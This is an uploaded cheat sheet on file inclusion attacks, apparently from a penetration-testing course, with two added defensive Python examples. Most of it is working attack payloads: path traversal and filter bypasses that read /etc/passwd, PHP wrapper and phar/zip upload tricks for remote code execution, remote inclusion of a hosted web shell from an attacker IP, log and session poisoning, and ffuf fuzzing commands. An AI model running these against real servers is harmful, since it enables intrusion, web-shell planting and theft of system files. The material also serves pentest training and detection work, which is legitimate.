
File Inclusion Module Cheat Sheet

This cheat sheet provides various commands and techniques for Local File Inclusion (LFI) and Remote Code Execution (RCE) vulnerabilities, including examples of bypassing filters and exploiting file inclusion functions in PHP, NodeJS, Java, and .NET. It also outlines methods for log poisoning and fuzzing parameters to discover vulnerabilities. Additionally, it includes wordlists for LFI and server configurations to aid in testing for these vulnerabilities.

Uploaded by paratester696

FILE INCLUSION CHEAT SHEET

Local File Inclusion

Basic LFI

| Command | Description |
|---|---|
| /index.php?language=/etc/passwd | Basic LFI |
| /index.php?language=../../../../etc/passwd | LFI with path traversal |
| /index.php?language=/../../../etc/passwd | LFI with name prefix |
| /index.php?language=./languages/../../../../etc/passwd | LFI with approved path |

LFI Bypasses

| Command | Description |
|---|---|
| /index.php?language=....//....//....//....//etc/passwd | Bypass basic path traversal filter |
| /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 | Bypass filters with URL encoding |
| /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] | Bypass appended extension with path truncation (obsolete) |
| /index.php?language=../../../../etc/passwd%00 | Bypass appended extension with null byte (obsolete) |
| /index.php?language=php://filter/read=convert.base64-encode/resource=config | Read PHP with base64 filter |
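
Why the ....// row gets past a single-pass filter, next to a check that canonicalises the path before deciding: this is an added example, not part of the original cheat sheet, and it models the logic in Python rather than PHP. BASE_DIR, naive_filter and resolve_safely are hypothetical names, and the directory path is an assumption.

```python
import os
from typing import Optional

# Assumed approved directory; the path is an assumption for this example.
BASE_DIR = os.path.realpath("/var/www/html/languages")

def naive_filter(value: str) -> str:
    """Single-pass removal of '../': the kind of filter '....//' defeats."""
    return value.replace("../", "")

def resolve_safely(value: str, base: str = BASE_DIR) -> Optional[str]:
    """Return the canonical path if it stays inside `base`, else None.

    `value` is the parameter as the framework hands it over (already
    URL-decoded once, as PHP's $_GET is).
    """
    if "\x00" in value:      # null-byte truncation attempt
        return None
    if "://" in value:       # stream wrappers and remote URLs
        return None
    # Canonicalise first, then compare: '..' segments, a leading '/' and
    # symlinks are all resolved before the containment decision is made.
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([candidate, base]) != base:
        return None
    return candidate
```

A fixed allowlist that maps language codes to file names takes the path out of user control entirely and is stricter than this check.
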
Remote Code Execution

PHP Wrappers

| Command | Description |
|---|---|
| /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id | RCE with data wrapper |
| curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | RCE with input wrapper |
| curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" | RCE with expect wrapper |

RFI

| Command | Description |
|---|---|
| echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT> | Host web shell |
| /index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id | Include remote PHP web shell |

LFI + Upload

| Command | Description |
|---|---|
| echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif | Create malicious image |
| /index.php?language=./profile_images/shell.gif&cmd=id | RCE with malicious uploaded image |
| echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php | Create malicious zip archive 'as jpg' |
| /index.php?language=zip://shell.zip%23shell.php&cmd=id | RCE with malicious uploaded zip |
| php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg | Create malicious phar 'as jpg' |
| /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id | RCE with malicious uploaded phar |

Log Poisoning

| Command | Description |
|---|---|
| /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd | Read PHP session parameters |
| /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E | Poison PHP session with web shell |
| /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id | RCE through poisoned PHP session |
| curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>' | Poison server log |
| /index.php?language=/var/log/apache2/access.log&cmd=id | RCE through poisoned PHP session |
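
The request shapes in the tables above leave recognisable traces in web server access logs. The following added example (not part of the original cheat sheet) classifies Apache combined-format log lines by the technique they match; the sample lines are constructed, and the rule names and regexes are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    r'10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 2287 "-" "Mozilla/5.0"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?language=....//....//....//....//etc/passwd HTTP/1.1" 200 3120 "-" "curl/8.0"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 2287 "-" "curl/8.0"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 4096 "-" "curl/8.0"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 2287 "-" "<?php system($_GET[\"cmd\"]); ?>"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:18 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9001 "-" "curl/8.0"',
]

# One rule per technique family listed in the cheat sheet.
RULES = {
    "path_traversal": re.compile(r"\.\.[/\\]"),
    "null_byte": re.compile(r"\x00"),
    "stream_wrapper": re.compile(r"(?:^|[=&])(?:php|data|expect|zip|phar|https?|ftp)://", re.I),
    "log_or_session_include": re.compile(r"=/var/(?:log|lib/php/sessions)/"),
    "php_code": re.compile(r"<\?(?:php|=)", re.I),
}
LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so single and double encoding both normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of rule names a log line triggers (empty set = clean)."""
    m = LINE.search(line)
    if not m:
        return set()
    query = decode_fully(m.group("uri").partition("?")[2])
    hits = {name for name, rx in RULES.items() if rx.search(query)}
    if RULES["php_code"].search(m.group("ua")):   # poisoned User-Agent
        hits.add("php_code_in_user_agent")
    return hits

def scan(lines):
    """Return (line number, sorted rule names) for every flagged line."""
    results = [(n, sorted(classify(l))) for n, l in enumerate(lines, 1)]
    return [r for r in results if r[1]]
```
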
Misc

| Command | Description |
|---|---|
| ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287 | Fuzz page parameters |
| ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287 | Fuzz LFI payloads |
| ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287 | Fuzz webroot path |
| ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287 | Fuzz server configurations |

LFI Wordlists

LFI-Jhaddix.txt

Webroot path wordlist for Linux

Webroot path wordlist for Windows

Server configurations wordlist for Linux

Server configurations wordlist for Windows

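File Inclusion Functions

PHP

| Function | Read Content | Execute | Remote URL |
|---|---|---|---|
| include()/include_once() | Yes | Yes | Yes |
| require()/require_once() | Yes | Yes | No |
| file_get_contents() | Yes | No | Yes |
| fopen()/file() | Yes | No | No |

NodeJS

| Function | Read Content | Execute | Remote URL |
|---|---|---|---|
| fs.readFile() | Yes | No | No |
| fs.sendFile() | Yes | No | No |
| res.render() | Yes | Yes | No |

Java

| Function | Read Content | Execute | Remote URL |
|---|---|---|---|
| include | Yes | No | No |
| import | Yes | Yes | Yes |

.NET

| Function | Read Content | Execute | Remote URL |
|---|---|---|---|
| @Html.Partial() | Yes | No | No |
| @Html.RemotePartial() | Yes | No | Yes |
| Response.WriteFile() | Yes | No | No |
| include | Yes | Yes | Yes |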
